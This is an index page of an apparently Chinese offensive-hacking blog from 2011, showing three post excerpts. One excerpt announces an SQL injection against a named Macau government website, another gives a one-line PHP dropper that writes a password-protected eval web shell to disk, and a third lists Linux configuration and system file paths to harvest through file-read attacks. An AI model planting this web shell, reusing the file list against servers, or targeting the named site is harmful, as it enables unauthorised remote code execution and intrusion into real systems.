Swane's blog

游弋于黑白之间,但愿我未曾来过……

导航

2011年4月5日 #

ihm.gov.mo SQL injection

摘要: ihm.gov.mo SQL injection 阅读全文

posted @ 2011-04-05 03:11 无名组 阅读(12) 评论(0) 推荐(0) 编辑

一句php代码生成php一句话小马的后门

摘要: <?fputs(fopen(linuxso.php,w),<?eval($_POST[nst]);?>)?>这样访问之后,在当前目录生成linuxso.php 内容为 <?eval($_POST[nst]);?>)?> 的一句话小马,密码为:nst 阅读全文

posted @ 2011-04-05 01:54 无名组 阅读(1148) 评论(0) 推荐(0) 编辑

Linux下敏感文件收集

摘要: etc/httpd/conf/httpd.conf/etc/rc.local 有时可以读出来apache的路径/usr/local/apache/conf/httpd.conf/var/www/html/apache/conf/httpd.conf/home/httpd/conf/httpd.conf/usr/local/apache2/conf/httpd.conf/usr/local/httpd/conf/httpd.conf/etc/apache/httpd.conf/usr/local/lib/php.ini/etc/hosts.deny 定义禁止访问本机的主机/etc/bashr 阅读全文

posted @ 2011-04-05 01:24 无名组 阅读(1281) 评论(0) 推荐(0) 编辑